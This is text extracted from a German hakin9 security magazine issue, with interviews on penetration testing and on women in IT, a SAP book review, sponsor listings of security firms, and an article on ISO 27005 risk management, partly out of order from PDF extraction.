hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
